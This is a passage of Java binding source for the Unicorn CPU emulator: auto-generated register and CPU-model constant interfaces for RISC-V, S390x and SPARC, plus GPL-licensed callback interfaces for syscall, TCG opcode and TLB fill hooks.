AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface RiscvConst { // RISCV32 CPU public static final int UC_CPU_RISCV32_ANY = 0; public static final int UC_CPU_RISCV32_BASE32 = 1; public static final int UC_CPU_RISCV32_SIFIVE_E31 = 2; public static final int UC_CPU_RISCV32_SIFIVE_U34 = 3; public static final int UC_CPU_RISCV32_ENDING = 4; // RISCV64 CPU public static final int UC_CPU_RISCV64_ANY = 0; public static final int UC_CPU_RISCV64_BASE64 = 1; public static final int UC_CPU_RISCV64_SIFIVE_E51 = 2; public static final int UC_CPU_RISCV64_SIFIVE_U54 = 3; public static final int UC_CPU_RISCV64_ENDING = 4; // RISCV registers public static final int UC_RISCV_REG_INVALID = 0; // General purpose registers public static final int UC_RISCV_REG_X0 = 1; public static final int UC_RISCV_REG_X1 = 2; public static final int UC_RISCV_REG_X2 = 3; public static final int UC_RISCV_REG_X3 = 4; public static final int UC_RISCV_REG_X4 = 5; public static final int UC_RISCV_REG_X5 = 6; public static final int UC_RISCV_REG_X6 = 7; public static final int UC_RISCV_REG_X7 = 8; public static final int UC_RISCV_REG_X8 = 9; public static final int UC_RISCV_REG_X9 = 10; public static final int UC_RISCV_REG_X10 = 11; public static final int UC_RISCV_REG_X11 = 12; public static final int UC_RISCV_REG_X12 = 13; public static final int UC_RISCV_REG_X13 = 14; public static final int UC_RISCV_REG_X14 = 15; public static final int UC_RISCV_REG_X15 = 16; public static final int UC_RISCV_REG_X16 = 17; public static final int UC_RISCV_REG_X17 = 18; public static final int UC_RISCV_REG_X18 = 19; public static final int UC_RISCV_REG_X19 = 20; public static final int UC_RISCV_REG_X20 = 21; public static final int UC_RISCV_REG_X21 = 22; public static final int UC_RISCV_REG_X22 = 23; public static final int UC_RISCV_REG_X23 = 24; public static final int UC_RISCV_REG_X24 = 25; public static final int UC_RISCV_REG_X25 = 26; public static final int UC_RISCV_REG_X26 = 27; public static final int UC_RISCV_REG_X27 = 28; public static final int UC_RISCV_REG_X28 = 29; public static final int UC_RISCV_REG_X29 = 30; public static final int UC_RISCV_REG_X30 = 31; public static final int UC_RISCV_REG_X31 = 32; // RISCV CSR public static final int UC_RISCV_REG_USTATUS = 33; public static final int UC_RISCV_REG_UIE = 34; public static final int UC_RISCV_REG_UTVEC = 35; public static final int UC_RISCV_REG_USCRATCH = 36; public static final int UC_RISCV_REG_UEPC = 37; public static final int UC_RISCV_REG_UCAUSE = 38; public static final int UC_RISCV_REG_UTVAL = 39; public static final int UC_RISCV_REG_UIP = 40; public static final int UC_RISCV_REG_FFLAGS = 41; public static final int UC_RISCV_REG_FRM = 42; public static final int UC_RISCV_REG_FCSR = 43; public static final int UC_RISCV_REG_CYCLE = 44; public static final int UC_RISCV_REG_TIME = 45; public static final int UC_RISCV_REG_INSTRET = 46; public static final int UC_RISCV_REG_HPMCOUNTER3 = 47; public static final int UC_RISCV_REG_HPMCOUNTER4 = 48; public static final int UC_RISCV_REG_HPMCOUNTER5 = 49; public static final int UC_RISCV_REG_HPMCOUNTER6 = 50; public static final int UC_RISCV_REG_HPMCOUNTER7 = 51; public static final int UC_RISCV_REG_HPMCOUNTER8 = 52; public static final int UC_RISCV_REG_HPMCOUNTER9 = 53; public static final int UC_RISCV_REG_HPMCOUNTER10 = 54; public static final int UC_RISCV_REG_HPMCOUNTER11 = 55; public static final int UC_RISCV_REG_HPMCOUNTER12 = 56; public static final int UC_RISCV_REG_HPMCOUNTER13 = 57; public static final int 
UC_RISCV_REG_HPMCOUNTER14 = 58; public static final int UC_RISCV_REG_HPMCOUNTER15 = 59; public static final int UC_RISCV_REG_HPMCOUNTER16 = 60; public static final int UC_RISCV_REG_HPMCOUNTER17 = 61; public static final int UC_RISCV_REG_HPMCOUNTER18 = 62; public static final int UC_RISCV_REG_HPMCOUNTER19 = 63; public static final int UC_RISCV_REG_HPMCOUNTER20 = 64; public static final int UC_RISCV_REG_HPMCOUNTER21 = 65; public static final int UC_RISCV_REG_HPMCOUNTER22 = 66; public static final int UC_RISCV_REG_HPMCOUNTER23 = 67; public static final int UC_RISCV_REG_HPMCOUNTER24 = 68; public static final int UC_RISCV_REG_HPMCOUNTER25 = 69; public static final int UC_RISCV_REG_HPMCOUNTER26 = 70; public static final int UC_RISCV_REG_HPMCOUNTER27 = 71; public static final int UC_RISCV_REG_HPMCOUNTER28 = 72; public static final int UC_RISCV_REG_HPMCOUNTER29 = 73; public static final int UC_RISCV_REG_HPMCOUNTER30 = 74; public static final int UC_RISCV_REG_HPMCOUNTER31 = 75; public static final int UC_RISCV_REG_CYCLEH = 76; public static final int UC_RISCV_REG_TIMEH = 77; public static final int UC_RISCV_REG_INSTRETH = 78; public static final int UC_RISCV_REG_HPMCOUNTER3H = 79; public static final int UC_RISCV_REG_HPMCOUNTER4H = 80; public static final int UC_RISCV_REG_HPMCOUNTER5H = 81; public static final int UC_RISCV_REG_HPMCOUNTER6H = 82; public static final int UC_RISCV_REG_HPMCOUNTER7H = 83; public static final int UC_RISCV_REG_HPMCOUNTER8H = 84; public static final int UC_RISCV_REG_HPMCOUNTER9H = 85; public static final int UC_RISCV_REG_HPMCOUNTER10H = 86; public static final int UC_RISCV_REG_HPMCOUNTER11H = 87; public static final int UC_RISCV_REG_HPMCOUNTER12H = 88; public static final int UC_RISCV_REG_HPMCOUNTER13H = 89; public static final int UC_RISCV_REG_HPMCOUNTER14H = 90; public static final int UC_RISCV_REG_HPMCOUNTER15H = 91; public static final int UC_RISCV_REG_HPMCOUNTER16H = 92; public static final int UC_RISCV_REG_HPMCOUNTER17H = 93; public static final int UC_RISCV_REG_HPMCOUNTER18H = 94; public static final int UC_RISCV_REG_HPMCOUNTER19H = 95; public static final int UC_RISCV_REG_HPMCOUNTER20H = 96; public static final int UC_RISCV_REG_HPMCOUNTER21H = 97; public static final int UC_RISCV_REG_HPMCOUNTER22H = 98; public static final int UC_RISCV_REG_HPMCOUNTER23H = 99; public static final int UC_RISCV_REG_HPMCOUNTER24H = 100; public static final int UC_RISCV_REG_HPMCOUNTER25H = 101; public static final int UC_RISCV_REG_HPMCOUNTER26H = 102; public static final int UC_RISCV_REG_HPMCOUNTER27H = 103; public static final int UC_RISCV_REG_HPMCOUNTER28H = 104; public static final int UC_RISCV_REG_HPMCOUNTER29H = 105; public static final int UC_RISCV_REG_HPMCOUNTER30H = 106; public static final int UC_RISCV_REG_HPMCOUNTER31H = 107; public static final int UC_RISCV_REG_MCYCLE = 108; public static final int UC_RISCV_REG_MINSTRET = 109; public static final int UC_RISCV_REG_MCYCLEH = 110; public static final int UC_RISCV_REG_MINSTRETH = 111; public static final int UC_RISCV_REG_MVENDORID = 112; public static final int UC_RISCV_REG_MARCHID = 113; public static final int UC_RISCV_REG_MIMPID = 114; public static final int UC_RISCV_REG_MHARTID = 115; public static final int UC_RISCV_REG_MSTATUS = 116; public static final int UC_RISCV_REG_MISA = 117; public static final int UC_RISCV_REG_MEDELEG = 118; public static final int UC_RISCV_REG_MIDELEG = 119; public static final int UC_RISCV_REG_MIE = 120; public static final int UC_RISCV_REG_MTVEC = 121; public static final int 
UC_RISCV_REG_MCOUNTEREN = 122; public static final int UC_RISCV_REG_MSTATUSH = 123; public static final int UC_RISCV_REG_MUCOUNTEREN = 124; public static final int UC_RISCV_REG_MSCOUNTEREN = 125; public static final int UC_RISCV_REG_MHCOUNTEREN = 126; public static final int UC_RISCV_REG_MSCRATCH = 127; public static final int UC_RISCV_REG_MEPC = 128; public static final int UC_RISCV_REG_MCAUSE = 129; public static final int UC_RISCV_REG_MTVAL = 130; public static final int UC_RISCV_REG_MIP = 131; public static final int UC_RISCV_REG_MBADADDR = 132; public static final int UC_RISCV_REG_SSTATUS = 133; public static final int UC_RISCV_REG_SEDELEG = 134; public static final int UC_RISCV_REG_SIDELEG = 135; public static final int UC_RISCV_REG_SIE = 136; public static final int UC_RISCV_REG_STVEC = 137; public static final int UC_RISCV_REG_SCOUNTEREN = 138; public static final int UC_RISCV_REG_SSCRATCH = 139; public static final int UC_RISCV_REG_SEPC = 140; public static final int UC_RISCV_REG_SCAUSE = 141; public static final int UC_RISCV_REG_STVAL = 142; public static final int UC_RISCV_REG_SIP = 143; public static final int UC_RISCV_REG_SBADADDR = 144; public static final int UC_RISCV_REG_SPTBR = 145; public static final int UC_RISCV_REG_SATP = 146; public static final int UC_RISCV_REG_HSTATUS = 147; public static final int UC_RISCV_REG_HEDELEG = 148; public static final int UC_RISCV_REG_HIDELEG = 149; public static final int UC_RISCV_REG_HIE = 150; public static final int UC_RISCV_REG_HCOUNTEREN = 151; public static final int UC_RISCV_REG_HTVAL = 152; public static final int UC_RISCV_REG_HIP = 153; public static final int UC_RISCV_REG_HTINST = 154; public static final int UC_RISCV_REG_HGATP = 155; public static final int UC_RISCV_REG_HTIMEDELTA = 156; public static final int UC_RISCV_REG_HTIMEDELTAH = 157; // Floating-point registers public static final int UC_RISCV_REG_F0 = 158; public static final int UC_RISCV_REG_F1 = 159; public static final int UC_RISCV_REG_F2 = 160; public static final int UC_RISCV_REG_F3 = 161; public static final int UC_RISCV_REG_F4 = 162; public static final int UC_RISCV_REG_F5 = 163; public static final int UC_RISCV_REG_F6 = 164; public static final int UC_RISCV_REG_F7 = 165; public static final int UC_RISCV_REG_F8 = 166; public static final int UC_RISCV_REG_F9 = 167; public static final int UC_RISCV_REG_F10 = 168; public static final int UC_RISCV_REG_F11 = 169; public static final int UC_RISCV_REG_F12 = 170; public static final int UC_RISCV_REG_F13 = 171; public static final int UC_RISCV_REG_F14 = 172; public static final int UC_RISCV_REG_F15 = 173; public static final int UC_RISCV_REG_F16 = 174; public static final int UC_RISCV_REG_F17 = 175; public static final int UC_RISCV_REG_F18 = 176; public static final int UC_RISCV_REG_F19 = 177; public static final int UC_RISCV_REG_F20 = 178; public static final int UC_RISCV_REG_F21 = 179; public static final int UC_RISCV_REG_F22 = 180; public static final int UC_RISCV_REG_F23 = 181; public static final int UC_RISCV_REG_F24 = 182; public static final int UC_RISCV_REG_F25 = 183; public static final int UC_RISCV_REG_F26 = 184; public static final int UC_RISCV_REG_F27 = 185; public static final int UC_RISCV_REG_F28 = 186; public static final int UC_RISCV_REG_F29 = 187; public static final int UC_RISCV_REG_F30 = 188; public static final int UC_RISCV_REG_F31 = 189; public static final int UC_RISCV_REG_PC = 190; public static final int UC_RISCV_REG_ENDING = 191; // Alias registers public static final int UC_RISCV_REG_ZERO = 1; 
public static final int UC_RISCV_REG_RA = 2; public static final int UC_RISCV_REG_SP = 3; public static final int UC_RISCV_REG_GP = 4; public static final int UC_RISCV_REG_TP = 5; public static final int UC_RISCV_REG_T0 = 6; public static final int UC_RISCV_REG_T1 = 7; public static final int UC_RISCV_REG_T2 = 8; public static final int UC_RISCV_REG_S0 = 9; public static final int UC_RISCV_REG_FP = 9; public static final int UC_RISCV_REG_S1 = 10; public static final int UC_RISCV_REG_A0 = 11; public static final int UC_RISCV_REG_A1 = 12; public static final int UC_RISCV_REG_A2 = 13; public static final int UC_RISCV_REG_A3 = 14; public static final int UC_RISCV_REG_A4 = 15; public static final int UC_RISCV_REG_A5 = 16; public static final int UC_RISCV_REG_A6 = 17; public static final int UC_RISCV_REG_A7 = 18; public static final int UC_RISCV_REG_S2 = 19; public static final int UC_RISCV_REG_S3 = 20; public static final int UC_RISCV_REG_S4 = 21; public static final int UC_RISCV_REG_S5 = 22; public static final int UC_RISCV_REG_S6 = 23; public static final int UC_RISCV_REG_S7 = 24; public static final int UC_RISCV_REG_S8 = 25; public static final int UC_RISCV_REG_S9 = 26; public static final int UC_RISCV_REG_S10 = 27; public static final int UC_RISCV_REG_S11 = 28; public static final int UC_RISCV_REG_T3 = 29; public static final int UC_RISCV_REG_T4 = 30; public static final int UC_RISCV_REG_T5 = 31; public static final int UC_RISCV_REG_T6 = 32; public static final int UC_RISCV_REG_FT0 = 158; public static final int UC_RISCV_REG_FT1 = 159; public static final int UC_RISCV_REG_FT2 = 160; public static final int UC_RISCV_REG_FT3 = 161; public static final int UC_RISCV_REG_FT4 = 162; public static final int UC_RISCV_REG_FT5 = 163; public static final int UC_RISCV_REG_FT6 = 164; public static final int UC_RISCV_REG_FT7 = 165; public static final int UC_RISCV_REG_FS0 = 166; public static final int UC_RISCV_REG_FS1 = 167; public static final int UC_RISCV_REG_FA0 = 168; public static final int UC_RISCV_REG_FA1 = 169; public static final int UC_RISCV_REG_FA2 = 170; public static final int UC_RISCV_REG_FA3 = 171; public static final int UC_RISCV_REG_FA4 = 172; public static final int UC_RISCV_REG_FA5 = 173; public static final int UC_RISCV_REG_FA6 = 174; public static final int UC_RISCV_REG_FA7 = 175; public static final int UC_RISCV_REG_FS2 = 176; public static final int UC_RISCV_REG_FS3 = 177; public static final int UC_RISCV_REG_FS4 = 178; public static final int UC_RISCV_REG_FS5 = 179; public static final int UC_RISCV_REG_FS6 = 180; public static final int UC_RISCV_REG_FS7 = 181; public static final int UC_RISCV_REG_FS8 = 182; public static final int UC_RISCV_REG_FS9 = 183; public static final int UC_RISCV_REG_FS10 = 184; public static final int UC_RISCV_REG_FS11 = 185; public static final int UC_RISCV_REG_FT8 = 186; public static final int UC_RISCV_REG_FT9 = 187; public static final int UC_RISCV_REG_FT10 = 188; public static final int UC_RISCV_REG_FT11 = 189; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/S390xConst.java000066400000000000000000000132101467524106700245300ustar00rootroot00000000000000// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface S390xConst { // S390X CPU public static final int UC_CPU_S390X_Z900 = 0; public static final int UC_CPU_S390X_Z900_2 = 1; public static final int UC_CPU_S390X_Z900_3 = 2; public static final int UC_CPU_S390X_Z800 = 3; public static final int UC_CPU_S390X_Z990 = 4; public static final int UC_CPU_S390X_Z990_2 = 5; public static final int UC_CPU_S390X_Z990_3 = 6; public static final int UC_CPU_S390X_Z890 = 7; public static final int UC_CPU_S390X_Z990_4 = 8; public static final int UC_CPU_S390X_Z890_2 = 9; public static final int UC_CPU_S390X_Z990_5 = 10; public static final int UC_CPU_S390X_Z890_3 = 11; public static final int UC_CPU_S390X_Z9EC = 12; public static final int UC_CPU_S390X_Z9EC_2 = 13; public static final int UC_CPU_S390X_Z9BC = 14; public static final int UC_CPU_S390X_Z9EC_3 = 15; public static final int UC_CPU_S390X_Z9BC_2 = 16; public static final int UC_CPU_S390X_Z10EC = 17; public static final int UC_CPU_S390X_Z10EC_2 = 18; public static final int UC_CPU_S390X_Z10BC = 19; public static final int UC_CPU_S390X_Z10EC_3 = 20; public static final int UC_CPU_S390X_Z10BC_2 = 21; public static final int UC_CPU_S390X_Z196 = 22; public static final int UC_CPU_S390X_Z196_2 = 23; public static final int UC_CPU_S390X_Z114 = 24; public static final int UC_CPU_S390X_ZEC12 = 25; public static final int UC_CPU_S390X_ZEC12_2 = 26; public static final int UC_CPU_S390X_ZBC12 = 27; public static final int UC_CPU_S390X_Z13 = 28; public static final int UC_CPU_S390X_Z13_2 = 29; public static final int UC_CPU_S390X_Z13S = 30; public static final int UC_CPU_S390X_Z14 = 31; public static final int UC_CPU_S390X_Z14_2 = 32; public static final int UC_CPU_S390X_Z14ZR1 = 33; public static final int UC_CPU_S390X_GEN15A = 34; public static final int UC_CPU_S390X_GEN15B = 35; public static final int UC_CPU_S390X_QEMU = 36; public static final int UC_CPU_S390X_MAX = 37; public static final int UC_CPU_S390X_ENDING = 38; // S390X registers public static final int UC_S390X_REG_INVALID = 0; // General purpose registers public static final int UC_S390X_REG_R0 = 1; public static final int UC_S390X_REG_R1 = 2; public static final int UC_S390X_REG_R2 = 3; public static final int UC_S390X_REG_R3 = 4; public static final int UC_S390X_REG_R4 = 5; public static final int UC_S390X_REG_R5 = 6; public static final int UC_S390X_REG_R6 = 7; public static final int UC_S390X_REG_R7 = 8; public static final int UC_S390X_REG_R8 = 9; public static final int UC_S390X_REG_R9 = 10; public static final int UC_S390X_REG_R10 = 11; public static final int UC_S390X_REG_R11 = 12; public static final int UC_S390X_REG_R12 = 13; public static final int UC_S390X_REG_R13 = 14; public static final int UC_S390X_REG_R14 = 15; public static final int UC_S390X_REG_R15 = 16; // Floating point registers public static final int UC_S390X_REG_F0 = 17; public static final int UC_S390X_REG_F1 = 18; public static final int UC_S390X_REG_F2 = 19; public static final int UC_S390X_REG_F3 = 20; public static final int UC_S390X_REG_F4 = 21; public static final int UC_S390X_REG_F5 = 22; public static final int UC_S390X_REG_F6 = 23; public static final int UC_S390X_REG_F7 = 24; public static final int UC_S390X_REG_F8 = 25; public static final int UC_S390X_REG_F9 = 26; public static final int UC_S390X_REG_F10 = 27; public static final int UC_S390X_REG_F11 = 28; public static final int UC_S390X_REG_F12 = 29; public static final int UC_S390X_REG_F13 = 30; public static final int UC_S390X_REG_F14 = 
31; public static final int UC_S390X_REG_F15 = 32; public static final int UC_S390X_REG_F16 = 33; public static final int UC_S390X_REG_F17 = 34; public static final int UC_S390X_REG_F18 = 35; public static final int UC_S390X_REG_F19 = 36; public static final int UC_S390X_REG_F20 = 37; public static final int UC_S390X_REG_F21 = 38; public static final int UC_S390X_REG_F22 = 39; public static final int UC_S390X_REG_F23 = 40; public static final int UC_S390X_REG_F24 = 41; public static final int UC_S390X_REG_F25 = 42; public static final int UC_S390X_REG_F26 = 43; public static final int UC_S390X_REG_F27 = 44; public static final int UC_S390X_REG_F28 = 45; public static final int UC_S390X_REG_F29 = 46; public static final int UC_S390X_REG_F30 = 47; public static final int UC_S390X_REG_F31 = 48; // Access registers public static final int UC_S390X_REG_A0 = 49; public static final int UC_S390X_REG_A1 = 50; public static final int UC_S390X_REG_A2 = 51; public static final int UC_S390X_REG_A3 = 52; public static final int UC_S390X_REG_A4 = 53; public static final int UC_S390X_REG_A5 = 54; public static final int UC_S390X_REG_A6 = 55; public static final int UC_S390X_REG_A7 = 56; public static final int UC_S390X_REG_A8 = 57; public static final int UC_S390X_REG_A9 = 58; public static final int UC_S390X_REG_A10 = 59; public static final int UC_S390X_REG_A11 = 60; public static final int UC_S390X_REG_A12 = 61; public static final int UC_S390X_REG_A13 = 62; public static final int UC_S390X_REG_A14 = 63; public static final int UC_S390X_REG_A15 = 64; public static final int UC_S390X_REG_PC = 65; public static final int UC_S390X_REG_PSWM = 66; public static final int UC_S390X_REG_ENDING = 67; // Alias registers } unicorn-2.1.1/bindings/java/src/main/java/unicorn/SparcConst.java000066400000000000000000000153271467524106700247650ustar00rootroot00000000000000// For Unicorn Engine. 
AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface SparcConst { // SPARC32 CPU public static final int UC_CPU_SPARC32_FUJITSU_MB86904 = 0; public static final int UC_CPU_SPARC32_FUJITSU_MB86907 = 1; public static final int UC_CPU_SPARC32_TI_MICROSPARC_I = 2; public static final int UC_CPU_SPARC32_TI_MICROSPARC_II = 3; public static final int UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9; public static final int UC_CPU_SPARC32_TI_SUPERSPARC_II = 10; public static final int UC_CPU_SPARC32_LEON2 = 11; public static final int UC_CPU_SPARC32_LEON3 = 12; public static final int UC_CPU_SPARC32_ENDING = 13; // SPARC64 CPU public static final int UC_CPU_SPARC64_FUJITSU = 0; public static final int UC_CPU_SPARC64_FUJITSU_III = 1; public static final int UC_CPU_SPARC64_FUJITSU_IV = 2; public static final int UC_CPU_SPARC64_FUJITSU_V = 3; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_I = 4; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_II = 5; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_III = 6; public static final int UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14; public static final int UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15; public static final int UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16; public static final int UC_CPU_SPARC64_ENDING = 17; // SPARC registers public static final int UC_SPARC_REG_INVALID = 0; public static final int UC_SPARC_REG_F0 = 1; public static final int UC_SPARC_REG_F1 = 2; public static final int UC_SPARC_REG_F2 = 3; public static final int UC_SPARC_REG_F3 = 4; public static final int UC_SPARC_REG_F4 = 5; public static final int UC_SPARC_REG_F5 = 6; public static final int UC_SPARC_REG_F6 = 7; public static final int UC_SPARC_REG_F7 = 8; public static final int UC_SPARC_REG_F8 = 9; public static final int UC_SPARC_REG_F9 = 10; public static final int UC_SPARC_REG_F10 = 11; public static final int UC_SPARC_REG_F11 = 12; public static final int UC_SPARC_REG_F12 = 13; public static final int UC_SPARC_REG_F13 = 14; public static final int UC_SPARC_REG_F14 = 15; public static final int UC_SPARC_REG_F15 = 16; public static final int UC_SPARC_REG_F16 = 17; public static final int UC_SPARC_REG_F17 = 18; public static final int UC_SPARC_REG_F18 = 19; public static final int UC_SPARC_REG_F19 = 20; public static final int UC_SPARC_REG_F20 = 21; public static final int UC_SPARC_REG_F21 = 22; public static final int UC_SPARC_REG_F22 = 23; public static final int UC_SPARC_REG_F23 = 24; public static final int UC_SPARC_REG_F24 = 25; public static final int UC_SPARC_REG_F25 = 26; public static final int UC_SPARC_REG_F26 = 27; public static final int UC_SPARC_REG_F27 = 28; public static final int UC_SPARC_REG_F28 = 29; public static final int UC_SPARC_REG_F29 = 30; public static final int UC_SPARC_REG_F30 = 31; public static 
final int UC_SPARC_REG_F31 = 32; public static final int UC_SPARC_REG_F32 = 33; public static final int UC_SPARC_REG_F34 = 34; public static final int UC_SPARC_REG_F36 = 35; public static final int UC_SPARC_REG_F38 = 36; public static final int UC_SPARC_REG_F40 = 37; public static final int UC_SPARC_REG_F42 = 38; public static final int UC_SPARC_REG_F44 = 39; public static final int UC_SPARC_REG_F46 = 40; public static final int UC_SPARC_REG_F48 = 41; public static final int UC_SPARC_REG_F50 = 42; public static final int UC_SPARC_REG_F52 = 43; public static final int UC_SPARC_REG_F54 = 44; public static final int UC_SPARC_REG_F56 = 45; public static final int UC_SPARC_REG_F58 = 46; public static final int UC_SPARC_REG_F60 = 47; public static final int UC_SPARC_REG_F62 = 48; public static final int UC_SPARC_REG_FCC0 = 49; public static final int UC_SPARC_REG_FCC1 = 50; public static final int UC_SPARC_REG_FCC2 = 51; public static final int UC_SPARC_REG_FCC3 = 52; public static final int UC_SPARC_REG_G0 = 53; public static final int UC_SPARC_REG_G1 = 54; public static final int UC_SPARC_REG_G2 = 55; public static final int UC_SPARC_REG_G3 = 56; public static final int UC_SPARC_REG_G4 = 57; public static final int UC_SPARC_REG_G5 = 58; public static final int UC_SPARC_REG_G6 = 59; public static final int UC_SPARC_REG_G7 = 60; public static final int UC_SPARC_REG_I0 = 61; public static final int UC_SPARC_REG_I1 = 62; public static final int UC_SPARC_REG_I2 = 63; public static final int UC_SPARC_REG_I3 = 64; public static final int UC_SPARC_REG_I4 = 65; public static final int UC_SPARC_REG_I5 = 66; public static final int UC_SPARC_REG_FP = 67; public static final int UC_SPARC_REG_I7 = 68; public static final int UC_SPARC_REG_ICC = 69; public static final int UC_SPARC_REG_L0 = 70; public static final int UC_SPARC_REG_L1 = 71; public static final int UC_SPARC_REG_L2 = 72; public static final int UC_SPARC_REG_L3 = 73; public static final int UC_SPARC_REG_L4 = 74; public static final int UC_SPARC_REG_L5 = 75; public static final int UC_SPARC_REG_L6 = 76; public static final int UC_SPARC_REG_L7 = 77; public static final int UC_SPARC_REG_O0 = 78; public static final int UC_SPARC_REG_O1 = 79; public static final int UC_SPARC_REG_O2 = 80; public static final int UC_SPARC_REG_O3 = 81; public static final int UC_SPARC_REG_O4 = 82; public static final int UC_SPARC_REG_O5 = 83; public static final int UC_SPARC_REG_SP = 84; public static final int UC_SPARC_REG_O7 = 85; public static final int UC_SPARC_REG_Y = 86; public static final int UC_SPARC_REG_XCC = 87; public static final int UC_SPARC_REG_PC = 88; public static final int UC_SPARC_REG_ENDING = 89; public static final int UC_SPARC_REG_O6 = 84; public static final int UC_SPARC_REG_I6 = 67; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/SyscallHook.java000066400000000000000000000021741467524106700251350ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 
   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
   02110-1301, USA.
*/
package unicorn;

/** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_SYSCALL} or
 * {@code UC_X86_INS_SYSENTER} */
public interface SyscallHook extends InstructionHook {
    /** Called to handle an x86 SYSCALL or SYSENTER instruction.
     *
     * @param u    {@link Unicorn} instance firing this hook
     * @param user user data provided when registering this hook
     */
    public void hook(Unicorn u, Object user);
}
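/* Illustrative sketch (not from the Unicorn sources): reacting to an x86-64
   SYSCALL with a SyscallHook. As in the earlier examples, the
   instruction-hook overload of hook_add and the begin=1, end=0
   "hook everywhere" convention are assumptions. */
import unicorn.*;

public class SyscallExample {
    public static void main(String[] args) {
        Unicorn uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_64);
        byte[] code = { 0x0F, 0x05 }; // syscall
        uc.mem_map(0x1000, 0x1000, Unicorn.UC_PROT_ALL);
        uc.mem_write(0x1000, code);
        uc.reg_write(Unicorn.UC_X86_REG_RAX, 60); // illustrative syscall number
        SyscallHook hook = (u, user) -> System.out.printf(
                "syscall with rax = %d%n",
                u.reg_read(Unicorn.UC_X86_REG_RAX));
        uc.hook_add(hook, Unicorn.UC_X86_INS_SYSCALL, 1, 0, null);
        uc.emu_start(0x1000, 0x1000 + code.length, 0, 0);
        uc.close();
    }
}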
unicorn-2.1.1/bindings/java/src/main/java/unicorn/TcgOpcodeHook.java
/* Java bindings for the Unicorn Emulator Engine

   Copyright(c) 2023 Robert Xiao

   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License version 2 as
   published by the Free Software Foundation.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
   02110-1301, USA.
*/
package unicorn;

/** Callback for {@code UC_HOOK_TCG_OPCODE} */
public interface TcgOpcodeHook extends Hook {
    /** Called on every instruction of the registered type(s) within the
     * registered range. For example, a {@code UC_TCG_OP_SUB} hook fires on
     * every instruction that contains a subtraction operation, unless
     * otherwise filtered.
     *
     * @param u       {@link Unicorn} instance firing this hook
     * @param address address of the instruction
     * @param arg1    first argument to the instruction
     * @param arg2    second argument to the instruction
     * @param size    size of the operands (currently, 32 or 64)
     * @param user    user data provided when registering this hook
     */
    public void hook(Unicorn u, long address, long arg1, long arg2,
            int size, Object user);
}
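/* Illustrative sketch (not from the Unicorn sources): observing sub-based
   comparisons with a TcgOpcodeHook. Assumes a hook_add overload of the form
   hook_add(TcgOpcodeHook callback, int opcode, int flags, long begin,
   long end, Object user), with UC_TCG_OP_SUB plus UC_TCG_OP_FLAG_CMP
   selecting comparison instructions such as x86 CMP. */
import unicorn.*;

public class TcgOpcodeExample {
    public static void main(String[] args) {
        Unicorn uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32);
        byte[] code = { 0x39, (byte) 0xC8 }; // cmp eax, ecx
        uc.mem_map(0x1000, 0x1000, Unicorn.UC_PROT_ALL);
        uc.mem_write(0x1000, code);
        TcgOpcodeHook hook = (u, address, arg1, arg2, size, user) ->
                System.out.printf(
                        "sub/cmp at 0x%x: operands 0x%x, 0x%x (%d-bit)%n",
                        address, arg1, arg2, size);
        uc.hook_add(hook, Unicorn.UC_TCG_OP_SUB,
                Unicorn.UC_TCG_OP_FLAG_CMP, 1, 0, null);
        uc.emu_start(0x1000, 0x1000 + code.length, 0, 0);
        uc.close();
    }
}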
unicorn-2.1.1/bindings/java/src/main/java/unicorn/TlbFillHook.java
/* Java bindings for the Unicorn Emulator Engine

   Copyright(c) 2023 Robert Xiao

   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License version 2 as
   published by the Free Software Foundation.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program; if not, write to the Free Software
   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
   02110-1301, USA.
*/
package unicorn;

/** Callback for {@code UC_HOOK_TLB_FILL} */
public interface TlbFillHook extends Hook {
